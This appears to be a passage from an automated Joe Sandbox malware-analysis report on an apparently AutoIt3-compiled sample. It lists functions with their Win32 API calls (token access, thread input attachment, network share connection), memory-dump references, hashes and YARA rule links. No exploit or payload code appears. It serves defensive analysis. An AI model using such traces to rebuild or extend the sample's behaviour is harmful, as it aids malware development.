                                                                • Opcode Fuzzy Hash: 2f796d80418c594c6c09a2855ba4339aea62dbe270a61140b7e177072ee9f6c6
                                                                • Instruction Fuzzy Hash: 77119E71A00205FFDB0A9F98DD85AEEB7BDEF89304F15842DE94297210D771AE89CB10
                                                                Function 0031B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0031B498
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0031B4AA
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0031B4C0
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0031B4DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: d79de8c08a01d751ef3d2a92d859614d64c60eed9bd91afaf969e1cbf7a370c7
                                                                • Instruction ID: 7b530c19a3ec34c991dc4cc3e45b960ec87e544e45a7e9a935b0a9a5cb86525a
                                                                • Opcode Fuzzy Hash: d79de8c08a01d751ef3d2a92d859614d64c60eed9bd91afaf969e1cbf7a370c7
                                                                • Instruction Fuzzy Hash: 1A11487A900218FFDB11DFA9C885EDDBBB8FB08700F208091E604B7290DB71AE50DB94
                                                                Function 002FB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 002FB5A5
                                                                • GetClientRect.USER32(?,?), ref: 0035E69A
                                                                • GetCursorPos.USER32(?), ref: 0035E6A4
                                                                • ScreenToClient.USER32(?,?), ref: 0035E6AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                • String ID:
                                                                • API String ID: 4127811313-0
                                                                • Opcode ID: 8970963423bb3cb2c3da6a6257dc1c91b7662b9fd2aee1b9941ba64f0fb5945b
                                                                • Instruction ID: 51995453af6d451f36d59ef20a7a8745cf38a6450fcac95a943e538a5f7bccf3
                                                                • Opcode Fuzzy Hash: 8970963423bb3cb2c3da6a6257dc1c91b7662b9fd2aee1b9941ba64f0fb5945b
                                                                • Instruction Fuzzy Hash: 47113631A10029BBCF16DF98CC558BEBBB8EB09345F404461EA42E7150D7B4AAA5CBA1
                                                                Function 0032732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00327352
                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00327385
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0032739B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003273A2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 2880819207-0
                                                                • Opcode ID: fb15c3e1ec03adc82b6bfe6c0aed54536dbb86c94d3d84fc9f73eb9666a263dd
                                                                • Instruction ID: 3225e6adacc7bcba76edbfb5afb0ff717c389fa03ca4edaf5b5702ff5a49e4d8
                                                                • Opcode Fuzzy Hash: fb15c3e1ec03adc82b6bfe6c0aed54536dbb86c94d3d84fc9f73eb9666a263dd
                                                                • Instruction Fuzzy Hash: AB11C476A04214AFC703DBACEC09BDE7BADAB4A310F144355F925D32A1D7B08D149BB1
                                                                Function 002FD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                • GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                • String ID:
                                                                • API String ID: 3970641297-0
                                                                • Opcode ID: d16a34141a004aa9fe7133c36156a471e102d7c7bb4fb519901f08a855020120
                                                                • Instruction ID: 58b025271d8efbc226fb267e231190c7534ec1eba2590d2c47cca7d901bbc1bc
                                                                • Opcode Fuzzy Hash: d16a34141a004aa9fe7133c36156a471e102d7c7bb4fb519901f08a855020120
                                                                • Instruction Fuzzy Hash: AE118E7251150DBFEB024FA0DC54EEBBB6EFF093A4F044121FA0952060C7B1DD609BA0
                                                                Function 00314DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                • Instruction ID: 15bd471d1672cc8a59a5529a48b0e95d538dfd4818d2dbd0041d2a46470264a8
                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                • Instruction Fuzzy Hash: 9101483600014AFBCF1B5F88DC028EE3F27BB1C351B598555FA2899031D336CAB2AB91
                                                                Function 00307452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00307A0D: __getptd_noexit.LIBCMT ref: 00307A0E
                                                                • __lock.LIBCMT ref: 0030748F
                                                                • InterlockedDecrement.KERNEL32(?), ref: 003074AC
                                                                • _free.LIBCMT ref: 003074BF
                                                                • InterlockedIncrement.KERNEL32(00DE27E0), ref: 003074D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                • String ID:
                                                                • API String ID: 2704283638-0
                                                                • Opcode ID: 3c9bb53a9c625b0fa3120c1457a49dda7752da0eaa0799d5ac1522a378d6cae3
                                                                • Instruction ID: 29d91fcc3a00f7858a0d1cb036de5ad8bf06d1f5b526623c15188dd292109846
                                                                • Opcode Fuzzy Hash: 3c9bb53a9c625b0fa3120c1457a49dda7752da0eaa0799d5ac1522a378d6cae3
                                                                • Instruction Fuzzy Hash: 1801C435E0BA11E7D713AF66941675DBB60BF04710F164105F4146B6C0C7207D11CFC2
                                                                Function 0034EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002FAFE3
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FAFF2
                                                                  • Part of subcall function 002FAF83: BeginPath.GDI32(?), ref: 002FB009
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FB033
                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0034EA8E
                                                                • LineTo.GDI32(00000000,?,?), ref: 0034EA9B
                                                                • EndPath.GDI32(00000000), ref: 0034EAAB
                                                                • StrokePath.GDI32(00000000), ref: 0034EAB9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                • String ID:
                                                                • API String ID: 1539411459-0
                                                                • Opcode ID: e306b53a8f85114d8cb4945b2f9df3c42c115cdbd04003f9cf3912bdf6cc5253
                                                                • Instruction ID: 1ccc37423db2d97fc24974adff7e65f15a7808c2b4ef1de84e57c20567010cd4
                                                                • Opcode Fuzzy Hash: e306b53a8f85114d8cb4945b2f9df3c42c115cdbd04003f9cf3912bdf6cc5253
                                                                • Instruction Fuzzy Hash: 54F05E31505259BBDB139F94AD09FCA3F5DAF0A311F188201FE11650E187B55561CBA5
                                                                Function 0031C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0031C84A
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0031C85D
                                                                • GetCurrentThreadId.KERNEL32 ref: 0031C864
                                                                • AttachThreadInput.USER32(00000000), ref: 0031C86B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 2710830443-0
                                                                • Opcode ID: 02b09f83a2be47231b813afee3fde909eb8a142dac1e8fbca98d6aed40cb782a
                                                                • Instruction ID: 7a971773f1b287d8c72040dbb04c4e5c4049e9e4c3ff5a7d71e62b9998c52c39
                                                                • Opcode Fuzzy Hash: 02b09f83a2be47231b813afee3fde909eb8a142dac1e8fbca98d6aed40cb782a
                                                                • Instruction Fuzzy Hash: C0E03971A81228BADB221BA2DC4DEDB7F1CEF0A7A1F40C021F60984461C6B18580CBE0
                                                                Function 0031B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 0031B0D6
                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0031AC9D), ref: 0031B0DD
                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0031AC9D), ref: 0031B0EA
                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0031AC9D), ref: 0031B0F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken
                                                                • String ID:
                                                                • API String ID: 3974789173-0
                                                                • Opcode ID: 9882fb826402b612be52ee28db1ac3ee3484e056be59847ec363f36b94ec9259
                                                                • Instruction ID: 11dcee5188e7b6ee7368538129271ef9bf5d057c8d5e168774c63fdb7167ef94
                                                                • Opcode Fuzzy Hash: 9882fb826402b612be52ee28db1ac3ee3484e056be59847ec363f36b94ec9259
                                                                • Instruction Fuzzy Hash: 5CE08632F01212DBD7211FB25C0CB877BACEF59791F12C818F241DA040DBB48441C760
                                                                Function 002FB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 002FB496
                                                                • SetTextColor.GDI32(?,000000FF), ref: 002FB4A0
                                                                • SetBkMode.GDI32(?,00000001), ref: 002FB4B5
                                                                • GetStockObject.GDI32(00000005), ref: 002FB4BD
                                                                • GetWindowDC.USER32(?,00000000), ref: 0035DE2B
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0035DE38
                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0035DE51
                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0035DE6A
                                                                • GetPixel.GDI32(00000000,?,?), ref: 0035DE8A
                                                                • ReleaseDC.USER32(?,00000000), ref: 0035DE95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                • String ID:
                                                                • API String ID: 1946975507-0
                                                                • Opcode ID: a2f47c813905f373556adfb336192128153e4772f1df9a755a5862aedb788f83
                                                                • Instruction ID: 2c48b93f7619931c4d30e6673339ac12b999f0fc8009c07e17c71e2b5ecb5749
                                                                • Opcode Fuzzy Hash: a2f47c813905f373556adfb336192128153e4772f1df9a755a5862aedb788f83
                                                                • Instruction Fuzzy Hash: 94E06D31600240AADF231F64EC0DBD83F15AB12336F00C226FB6A580E1C3F18584CB11
                                                                Function 0035B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                • String ID:
                                                                • API String ID: 2889604237-0
                                                                • Opcode ID: 902ce345d71579c04fdf4921e9d4544ec80547244107242843144fa4993cb15c
                                                                • Instruction ID: d6745ddd170275c1bd394d7de2097f1e5afceb2781e2c8c6901109f8b8dafa36
                                                                • Opcode Fuzzy Hash: 902ce345d71579c04fdf4921e9d4544ec80547244107242843144fa4993cb15c
                                                                • Instruction Fuzzy Hash: 60E04FB1A00204EFDB025F70DC48A2DBBADEB4C351F12C816FD5A87250CBF498409F50
                                                                Function 0031B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0031B2DF
                                                                • UnloadUserProfile.USERENV(?,?), ref: 0031B2EB
                                                                • CloseHandle.KERNEL32(?), ref: 0031B2F4
                                                                • CloseHandle.KERNEL32(?), ref: 0031B2FC
                                                                  • Part of subcall function 0031AB24: GetProcessHeap.KERNEL32(00000000,?,0031A848), ref: 0031AB2B
                                                                  • Part of subcall function 0031AB24: HeapFree.KERNEL32(00000000), ref: 0031AB32
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                • String ID:
                                                                • API String ID: 146765662-0
                                                                • Opcode ID: 8528eafc1d587437752d7e6336342ef788ae85aef1cbf9a5148495137363dd8c
                                                                • Instruction ID: 1fd03fd8f7672e770c7cee5991d4656a13acfb545f2adfac98cc695ce283b07a
                                                                • Opcode Fuzzy Hash: 8528eafc1d587437752d7e6336342ef788ae85aef1cbf9a5148495137363dd8c
                                                                • Instruction Fuzzy Hash: FFE0E63A604405BFCB032F95EC08859FF7AFF88321710C621F61581571CB72A471EB91
                                                                Function 0035B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                • String ID:
                                                                • API String ID: 2889604237-0
                                                                • Opcode ID: 5f478153dd08201d2c78db2e4b54dd2bb181a47f334075522d91f58f831de1fe
                                                                • Instruction ID: 9bebc2a493c1c757d1d2a1ae54c9caee3d6f825e2e4cc450210799825018144b
                                                                • Opcode Fuzzy Hash: 5f478153dd08201d2c78db2e4b54dd2bb181a47f334075522d91f58f831de1fe
                                                                • Instruction Fuzzy Hash: 5DE046B1A00204EFDB025F70DC4862DBBA9EB4C390F12C81AFA5A8B250CBF898008F10
                                                                Function 0031DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0031DEAA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ContainedObject
                                                                • String ID: AutoIt3GUI$Container
                                                                • API String ID: 3565006973-3941886329
                                                                • Opcode ID: 783852e742430486f8124b32737573d59b72b284aecf8d97e13189ed4bcb63b7
                                                                • Instruction ID: 2f17c55f29e47c83ebe098514c106188cdf21cfc34b672ac9a0795f18e7d8418
                                                                • Opcode Fuzzy Hash: 783852e742430486f8124b32737573d59b72b284aecf8d97e13189ed4bcb63b7
                                                                • Instruction Fuzzy Hash: 1F915874600601AFDB19DF64C884BAAB7F9BF49710F10846DF94ACF690DB71E981CB60
                                                                Function 0032DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • __wcsnicmp.LIBCMT ref: 0032DEFD
                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0032DFC6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                • String ID: LPT
                                                                • API String ID: 3222508074-1350329615
                                                                • Opcode ID: bae68019986ba4c06ac42f0c5d50470aae5bc4cc3b2219e32cbb8f14d19d3c8b
                                                                • Instruction ID: 8db41689098a23ec402212fad5c1460af2eaab52406b19fda7619f89537b02d0
                                                                • Opcode Fuzzy Hash: bae68019986ba4c06ac42f0c5d50470aae5bc4cc3b2219e32cbb8f14d19d3c8b
                                                                • Instruction Fuzzy Hash: 4161B375A00225AFCB15DF99D982EAEB7B8FF08310F11806AF546AB291D770AE41CF54
                                                                Function 0032290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy
                                                                • String ID: I/5$I/5
                                                                • API String ID: 3048848545-3346013609
                                                                • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                • Instruction ID: 6454ea65542aae3081545f9f28d12dca57d050a805305124161ea893b4bf920e
